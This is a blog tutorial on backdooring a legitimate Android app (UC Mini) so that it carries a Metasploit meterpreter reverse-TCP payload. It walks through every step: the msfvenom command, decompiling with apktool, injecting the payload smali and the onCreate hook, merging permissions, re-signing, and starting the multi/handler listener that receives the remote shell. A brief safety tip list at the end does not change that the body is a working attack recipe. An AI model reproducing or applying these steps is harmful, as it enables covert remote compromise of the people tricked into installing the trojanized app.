Backdooring Android APK | Part 1 | HACK WITH BEN
Backdooring Android APK | Part 1 | HACK WITH BEN
why hackers choose Android?
Android is world's most popular OS when it comes to smartphones and in India only almost 90% of people who use smartphone's are having are having Android running on their devices. Because of fragmentation problem of Android it is become the first choice of cyber criminals to exploit.
Android users are not too much familiar with the android security, which is an another point cyber criminals are taking advantage, and via social engineering they are making users install backdoor applications which results in device compromise, whether it's nugget or pie version.We will talk about how to backdoor your payload to original apk.(MANUALLY)
*Difficulty: Hard*
Pre-Requisites:
- Kali Linux or Parrot OS , you can use any other OS but i prefer Kali Linux.
- The original APK I'm using UC Mini.
Steps to generate meterpreter paylaod
Step 1: Generate a Payload apk using msfvenom.
If you are not root user use sudo to open metasploit framwork.
#msfvenom -p android/meterpreter/reverse_tcp LHOST=Your_IP LPORT=Incoming_Port R > Payload.apk
The available payloads are:
- reverse_https
- reverse_http
- reverse_tcp
Step 2: Using APK Tool:
- Copy the Downloaded Original apk and the Payload apk to a Folder in Easy Apk Tool folder.
- Decompile Payload and Original apk.
- #apktool d -f payload.apk
- #apktool d -f UCMini.apk
- Copy the Payload files (smali files) to the UCMini apk folder.
- You will find Payload files in /Payload/smali/com/metasploit/stage/
- Open UCMini folder next open smali folder next com folder and next create metasploit folder and open metasploit folder and create stage folder and open stage folder and paste Payload files(smali files).
- Open the UCMini App folder and open the AndroidManifest file using any Text Editor.
- Now find an activity tag
- <action android:name=”android.intent.action.MAIN”/>
- <category android:name=”android.intent.category.LAUNCHER”/>
- When you find it, copy its android:name.Then open a new file and paste it there.
- If you replace the dots with backslashes you will find that it is actually an address of the .main.UCMobile file.
- com\UCMobile\main\UCMobile
- Note: It is not necessary that the smali file’s name is StartActivity.Some other app may have some other name of the smali file like MainActivity etc.
- Open the UCMobile.smali file with a Text Editor.
- Now search for
- ;->onCreate(Landroid/os/Bundle;) V
- When you locate it, paste the following code in the line next to it :
- invoke-static {p0},Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
- Save the file.
- we have to give the App all the Permissions.
- Next copy all the uses-permission from the payload AndroidManifest file to the Original apk AndroidManifest file.
- Check for there is no duplicate permissions.
- save the file.
Step 6: Re-compile the Original apk:
- Using apktool .
- #apktool b UCMini
-
Now we are gonna Generate a key key.jks with KeyTool. I'm using key.keystore instead of key.jks but you can use key.jks. - For this, type in Terminal :
- keytool -genkey -V -keystore <Path and filename to store> -alias <alias-name> -keyalg RSA -keysize 2048 -validity 1000
- Enter a Remember-able KeyStore Password. (i.e. 123456)
Step 7:Signing the Application using jarsigner:
- Enter in terminal:
- jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore <our keystore path> UCMini.apk <alias-name>
- enter the keytore password:
Step 8: Transfer the App and Exploit:
Start Metasploit, type the following commands in terminal
- msfconsole
- use exploit/multi/handler
- set paylaod android/meterpreter/reverse_tcp
- set lhsot <Your_IP>
- set lport <Your_Port>
- exploit
(if you have any doubts and errors just let me know in the comment box)
STAY SAFE
- Always use Google Play Store for installing Android application.
- Never download and install any application from unknown source.
- Always check for the permission which an application is using while installing the application in the android phone.
Comments
Post a Comment